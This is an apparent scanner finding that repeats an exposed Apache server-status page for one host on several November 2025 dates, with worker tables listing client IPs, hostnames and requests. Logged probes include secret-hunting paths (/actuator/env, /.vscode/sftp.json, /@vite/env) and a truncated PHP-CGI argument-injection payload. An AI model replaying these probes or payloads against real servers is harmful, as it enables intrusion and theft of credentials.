104.22.7.128h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35441265530/4/38519_ 3.0293971177092100.00.021299.53 162.158.193.188h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35441265530/7/38823_ 4.7578380192630150.00.041166.10 104.22.7.164h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35441265530/3/38244_ 4.25783321215314270.00.001162.37 172.68.135.66h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35441265530/3/38162_ 4.7578380188615120.00.011303.66
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e339de488e
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 14-Nov-2025 18:13:42 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 344 Parent Server MPM Generation: 343 Server uptime: 63 days 5 hours 52 minutes 40 seconds Server load: 0.00 0.11 0.20 Total accesses: 2005141 - Total Traffic: 62.5 GB - Total Duration: 1147037718 CPU Usage: u132.28 s183.74 cu10988.2 cs6200.49 - .32% CPU load .367 requests/sec - 12.0 kB/second - 32.7 kB/request - 572.048 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03949547no0yes010000 13949546no0yes010000 23949549no0yes010000 33949548no1yes010000 43949682no2yes19000 Sum503 149000 ________________________________________________W_ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-34339495470/1/37511_ 0.0120290205030.00.001391.67 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 0-34339495470/0/36850_ 0.00228441416620.00.001231.50 162.158.123.72h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/1/37223_ 0.0100157508430.00.001243.97 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-34339495470/0/37251_ 0.004434176130720.00.001296.44 162.158.123.73h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/0/37521_ 0.0044413162812070.00.001284.83 172.68.15.231h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/0/37533_ 0.0044355171758050.00.001267.01 172.70.34.86h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/0/37592_ 0.004480241383020.00.001182.58 43.135.145.117http/1.1barrerasdecontencion.com:443GET / HTTP/1.1 0-34339495470/0/37130_ 0.0044554156167300.00.001259.09 104.23.239.64h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/0/37436_ 0.00440166766920.00.001191.06 172.70.224.183h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/0/37288_ 0.004423195653140.00.001313.61 162.158.122.72h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/1/42634_ 0.0020180413990.00.001377.90 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-34339495460/0/43350_ 0.00440213698210.00.001385.11 213.0.55.154h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-34339495460/0/42902_ 0.0020208304130.00.001344.16 162.158.79.139h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/0/42756_ 0.0044374200170480.00.001315.97 213.0.55.154h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-34339495460/0/43453_ 0.00440179791440.00.001385.49 172.70.35.207h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/0/43997_ 0.00440188937820.00.001313.92 162.158.41.6h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/0/43274_ 0.00440228301680.00.001326.35 162.159.99.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/0/43734_ 0.00440181480000.00.001290.41 213.0.55.154h2cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/0/41995_ 0.00440290412900.00.001197.19 172.68.22.47h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/0/43406_ 0.00440418224720.00.001265.27 172.69.208.195h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/1/41111_ 0.0120199585540.00.001249.97 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql HTTP/1.1 2-34339495490/0/40175_ 0.0020242416160.00.001186.79 172.71.191.7h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/0/40891_ 0.00440264162450.00.001277.22 172.68.55.186h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/0/40084_ 0.00441192359940.00.001214.62 172.68.55.186h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/0/40405_ 0.00441162505630.00.001402.98 188.114.111.252h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/0/40718_ 0.0044418187093010.00.001200.26 104.23.172.5h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/0/40338_ 0.0044342179702210.00.001220.57 172.71.102.115h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/0/40569_ 0.00441188914510.00.001255.73 172.68.245.100h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/0/40664_ 0.00441194468780.00.001396.38 162.158.42.107h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/0/40684_ 0.00440220746510.00.001273.54 172.71.146.43h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34339495480/1/42775_ 0.0300246920920.00.001360.59 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-34339495480/1/41395_ 0.00132198907570.00.001205.78 162.158.120.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34339495480/2/42522_ 0.0300216730510.00.001352.43 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-34339495480/1/41785_ 0.0210259793860.00.001380.81 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-34339495480/0/41779_ 0.001197183855990.00.001266.06 172.70.115.224h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34339495480/0/41822_ 0.000460186388420.00.001319.19 104.23.187.83h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34339495480/2/42199_ 0.0310211051410.00.011404.19 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-34339495480/0/42272_ 0.000487289176510.00.001342.75 172.70.208.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34339495480/2/41493_ 0.0300835276170.00.001310.75 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-34339495480/2/42711_ 0.0300328736110.00.001348.31 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 4-34339496820/0/37303_ 0.0010327669510.00.001201.54 172.68.55.203h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-34339496820/3/37385_ 0.0310196646020.00.001250.01 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 4-34339496820/2/37569_ 0.0400169986180.00.001281.50 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 4-34339496820/1/37867_ 0.011419173581520.00.031148.08 104.23.187.83h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-34339496820/0/37311_ 0.000708181201310.00.001144.27 172.68.23.192h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/r
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3084068eb
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 12-Nov-2025 17:11:07 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 334 Parent Server MPM Generation: 333 Server uptime: 61 days 4 hours 50 minutes 4 seconds Server load: 0.09 0.12 0.15 Total accesses: 1927356 - Total Traffic: 59.9 GB - Total Duration: 1112930347 CPU Usage: u233.94 s237.36 cu10482.1 cs5916.06 - .319% CPU load .364 requests/sec - 11.9 kB/second - 32.6 kB/request - 577.439 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03628750no1yes010000 13628751no1yes19000 23628755no1yes010000 33628857no0yes010000 43628886no0yes010000 Sum503 149000 ____________W_____________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33336287500/138/35761_ 20.2200282102820.04.911326.11 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-33336287500/130/35147_ 20.2010434154720.014.931197.47 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-33336287500/141/35495_ 20.2210150202150.02.351209.37 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 0-33336287500/150/35470_ 20.2011167321600.03.381242.96 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-33336287500/130/35751_ 20.2000156159350.018.881234.32 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 0-33336287500/126/35841_ 20.2210164456410.04.601217.40 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 0-33336287500/146/35940_ 20.2200233018710.03.471137.75 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-33336287500/134/35370_ 20.2210149086850.017.461188.96 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 0-33336287500/139/35737_ 20.2010158788070.04.061164.83 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 0-33336287500/150/35553_ 20.2200187618000.028.541271.43 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-33336287510/99/42139_ 18.5200179035790.017.801345.92 172.68.27.8h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/103/42846_ 18.5800212175100.02.941360.89 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-33336287510/98/42432W 18.5300206727000.028.411325.87 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-33336287510/149/42274_ 18.5800198614830.03.901277.44 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-33336287510/103/42946_ 18.5400177379660.016.311354.55 172.69.67.223h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/93/43495_ 18.5800186889490.014.121277.60 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-33336287510/117/42779_ 18.5800226645170.03.021291.93 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-33336287510/95/43222_ 18.5800179473480.05.611266.92 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-33336287510/95/41532_ 18.5800287777950.03.871180.16 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-33336287510/104/42908_ 18.5800416353760.01.691222.23 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-33336287550/78/38907_ 17.26480189863950.02.921157.25 172.68.213.163h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/78/37968_ 17.4170232973250.03.271086.61 172.70.215.110h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/87/38664_ 17.41530254485970.023.751195.87 172.70.206.46h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/85/37903_ 17.4737241179801980.06.451135.28 172.69.65.78h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-33336287550/68/38135_ 17.494230152555110.04.271325.58 195.76.169.226h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/73/38504_ 17.501250175733120.02.141136.23 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/74/38282_ 17.4737634170303780.04.011160.67 172.69.65.78h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/88/38321_ 17.3642557179908610.01.391137.86 172.68.135.65h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/75/38598_ 17.4770181913900.03.271300.16 172.71.166.45h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/80/38462_ 17.42480209927720.015.321181.15 172.64.217.79h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/907/41432_ 50.861380241742010.022.581292.53 172.68.7.3h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/790/40067_ 51.0310115194028000.027.001167.70 195.76.169.226h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/851/41126_ 50.74960211725730.049.881316.05 172.71.174.125h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/838/40478_ 51.001380254692030.074.471355.15 162.158.155.160h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/820/40477_ 50.881430178599980.031.571232.05 172.70.55.151h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/911/40543_ 50.98450181542500.033.531260.98 172.68.134.121h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/928/40895_ 51.011380206257310.014.561358.48 172.70.111.144h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/937/40946_ 51.02450284227340.027.171315.08 172.70.214.78h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/867/40141_ 50.87960830365390.029.211280.81 108.162.212.132h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/886/41376_ 51.05500322681070.015.611302.75 162.158.174.69h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-33336288860/1189/35339_ 58.581380316608170.043.311140.70 172.68.7.200h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-33336288860/1180/35380_ 58.721370187059930.032.621190.20 104.23.190.81h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-33336288860/1176/35488_ 58.591380160322200.022.841220.82 172.68.12.82h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-33336288860/1261/35888_ 58.731370165303120.028.001097.28 162.158.187.90h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-33336288860/1236/35315
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3f06edc76
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 10-Nov-2025 21:19:44 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 326 Parent Server MPM Generation: 325 Server uptime: 59 days 8 hours 58 minutes 41 seconds Server load: 0.12 0.07 0.07 Total accesses: 1862338 - Total Traffic: 57.7 GB - Total Duration: 1069035564 CPU Usage: u150.06 s189.41 cu10239.7 cs5763.73 - .319% CPU load .363 requests/sec - 11.8 kB/second - 32.5 kB/request - 574.029 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03435778no0yes010000 13435914no0yes010000 23435779no1yes010000 33435776no1yes010000 43435777no1yes19000 Sum503 149000 _________________________________________W________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32534357780/44/34869_ 4.9211524279456020.00.871305.72 172.68.62.98h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/34/34326_ 6.4590431929070.01.001168.77 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql HTTP/1.1 0-32534357780/37/34645_ 6.0511570147252040.01.001189.04 172.70.43.168h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/44/34632_ 4.911350165232170.013.731210.90 172.68.63.32h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/45/34924_ 5.2011520153875170.01.381196.42 162.158.249.130h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/37/35046_ 5.2111521161698060.00.431187.96 162.158.120.148h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/42/35073_ 6.0590230621190.013.621105.36 172.71.190.66h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/39/34530_ 5.201350146752040.00.661154.77 162.158.249.140h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/39/34891_ 6.401400156419190.01.301143.73 104.23.248.138h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/32/34694_ 5.2011520185402400.00.371224.32 162.158.249.140h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-32534359140/45/40384_ 6.7111570173905360.01.461268.48 172.71.190.234h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/47/41002_ 6.6213940206343620.00.701302.88 162.158.162.96h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/48/40678_ 5.7911521199659660.01.091222.50 162.158.249.142h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/45/40428_ 5.5013940192923620.01.211185.58 172.68.62.122h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/46/41246_ 5.7813891172018590.01.221276.66 162.158.249.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/41/41766_ 5.7911520180970810.00.951233.46 162.158.249.142h2tandemsl.com:443done, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 1-32534359140/43/41071_ 6.0111500220981100.01.181228.26 172.70.206.47h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/39/41545_ 5.8011500174372640.01.861203.70 162.158.249.136h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-32534359140/44/39817_ 6.5613891174976020.013.471143.69 172.71.190.78h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/50/41123_ 6.7311550408752100.00.831137.03 172.71.223.218h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/43/37810_ 6.271240186706130.01.131122.28 162.158.249.134h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/60/36778_ 6.2423780229873120.02.801044.29 172.68.210.27h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/49/37533_ 7.17180251388950.01.771156.41 162.158.152.182h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/56/36702_ 6.75126429176007990.02.451075.75 172.70.248.93h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/84/37031_ 7.041240149005230.02.271289.57 188.114.111.214h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/60/37403_ 5.961260171401890.02.041117.49 172.68.62.242h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/56/37194_ 7.5290167029760.01.841138.12 172.70.208.7h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/55/37165_ 7.5791176575990.01.901120.25 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-32534357790/51/37476_ 7.56232178623870.01.421238.70 172.68.134.209h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/54/37326_ 7.52180206303320.01.111149.31 172.71.124.95h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/197/40076_ 10.5830237341470.02.181262.48 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-32534357760/202/38786_ 10.5500186970970.02.521128.60 172.68.135.24h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/188/39765_ 10.5810197293120.04.151246.98 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-32534357760/208/39163_ 10.5820246978300.02.661269.64 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-32534357760/197/39166_ 10.5800167977690.02.891188.10 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-32534357760/222/39178_ 10.5750176439200.02.001193.61 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-32534357760/207/39450_ 10.5550195016510.014.851330.03 172.68.134.130h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/207/39498_ 10.5551274939500.02.141262.16 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-32534357760/198/38824_ 10.5530824057630.01.911235.41 172.68.135.204h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/208/39976_ 10.5820317119560.02.051275.31 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 4-32534357770/235/33916_ 12.1630303804480.02.791091.50 162.158.120.202h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32534357770/226/33993W 12.2000145745890.03.101155.22 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-32534357770/242/34074_ 12.2210146332050.04.921172.09 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-32534357770/229/34412_ 12.2200161643180.03.971044.20 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-32534357770/242/33859_ 12.2220166567550.02.751058.87 206.81.2
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e336b5eeae
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 08-Nov-2025 17:05:36 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 315 Parent Server MPM Generation: 314 Server uptime: 57 days 4 hours 44 minutes 33 seconds Server load: 0.27 0.21 0.11 Total accesses: 1802332 - Total Traffic: 56.0 GB - Total Duration: 1035343460 CPU Usage: u176.06 s202.59 cu9876.22 cs5537 - .32% CPU load .365 requests/sec - 11.9 kB/second - 32.6 kB/request - 574.447 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03208962no0yes010000 13208961no0yes010000 23209093no2yes19000 33208959no0yes010000 43208960no0yes010000 Sum502 149000 _______________________W__________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-31432089620/14/34076_ 11.08150082270540980.00.251268.80 178.128.207.138http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/23/33532_ 11.918301420927460.00.261153.68 172.71.146.155h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/14/33837_ 9.6815000144648180.00.861160.68 198.41.231.112h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/9/33806_ 11.0982581155917670.00.541183.55 178.128.207.138http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/15/34134_ 11.09349083142919220.00.721183.84 178.128.207.138http/1.1barrerasdecontencion.com:443GET /info.php HTTP/1.1 0-31432089620/13/34252_ 10.448240159094340.00.651173.59 198.41.227.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/15/34237_ 11.6915050222825370.00.811079.54 104.23.245.172h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/13/33710_ 9.7515050139605950.00.131127.14 172.69.71.214h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/16/34066_ 10.528300151139730.00.411120.30 162.158.82.167h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/21/33882_ 10.4434890176592140.00.521211.11 172.71.175.4h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/14/38904_ 11.218301164385310.00.441235.57 172.71.146.50h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/18/39576_ 10.46350475201184510.00.971277.76 178.128.207.138http/1.1barrerasdecontencion.com:443GET /swagger/v1/swagger.json HTTP/1.1 1-31432089610/15/39206_ 9.218221194112270.00.311192.68 104.23.186.189h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/17/38937_ 10.018270188108400.00.641129.52 